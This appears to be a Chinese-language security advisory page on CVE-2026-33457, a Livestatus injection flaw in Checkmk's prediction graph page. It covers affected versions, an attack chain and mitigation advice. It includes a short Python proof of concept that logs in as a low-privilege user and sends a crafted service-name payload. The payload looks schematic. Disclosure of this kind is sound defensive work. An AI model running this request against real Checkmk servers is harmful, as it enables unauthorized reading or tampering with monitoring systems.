CVE-2026-33457 CVSS 6.3 中危

CVE-2026-33457 Checkmk Livestatus注入漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33457

漏洞类型

Livestatus注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Checkmk

漏洞概述

Checkmk在预测图表页面存在Livestatus注入漏洞。由于对服务描述值清理不充分，经过身份验证的攻击者可通过精心构造的服务名称参数注入任意Livestatus命令。受影响版本包括2.5.0b4、2.4.0p26及2.3.0p47之前的版本。

技术细节

该漏洞源于Checkmk预测图表页面在处理服务名称参数时，未对用户提供的“服务描述”值进行严格的输入验证和清理。Livestatus是Checkmk用于查询监控数据的核心组件。攻击者利用此漏洞，可以在具有低权限账户的情况下，通过发送特制的HTTP请求，将恶意Livestatus查询语句注入到后端查询中。虽然攻击者需要身份认证，但由于不需要用户交互，一旦注入成功，攻击者可以利用Livestatus接口读取敏感信息、修改配置或执行特定的监控操作，从而对系统的机密性、完整性和可用性造成影响。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是受影响版本的Checkmk。

STEP 2

获取访问权限

攻击者获取一个有效的低权限用户账户凭据（PR:L）。

STEP 3

漏洞利用

攻击者向预测图表页面发送特制的HTTP请求，在服务名称参数中注入恶意的Livestatus命令。

STEP 4

命令执行

后端服务器解析服务描述时，将注入的命令传递给Livestatus API执行。

STEP 5

达成影响

攻击者利用Livestatus接口读取敏感监控数据、修改配置或影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-checkmk/check_mk/view.py?view_name=service_prediction_graph"
username = "low_priv_user"
password = "password"

# Payload construction
# Injecting Livestatus command to list all hosts or stats
# The payload attempts to break the original query logic
malicious_service_name = "ValidService] Stats: state = 0"

params = {
    "service": malicious_service_name,
    "host": "localhost"
}

session = requests.Session()

# 1. Login
login_payload = {
    "_username": username,
    "_password": password,
    "_login": "1"
}
session.post("http://target-checkmk/check_mk/login.py", data=login_payload)

# 2. Send Exploit
response = session.get(target_url, params=params)

if response.status_code == 200:
    print("[+] Exploit sent successfully.")
    print("[+] Response snippet:", response.text[:200])
else:
    print("[-] Failed to send exploit.")

影响范围

Checkmk < 2.5.0b4

Checkmk < 2.4.0p26

Checkmk < 2.3.0p47

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用预测图表功能或严格限制对受影响页面的网络访问。同时，应加强对Livestatus查询日志的监控，以检测可能的注入尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33457
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33457
3 Details https://www.cvedetails.com/cve/CVE-2026-33457/
4 VulDB https://vuldb.com/cve/CVE-2026-33457
5 Link https://checkmk.com/werk/17990

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表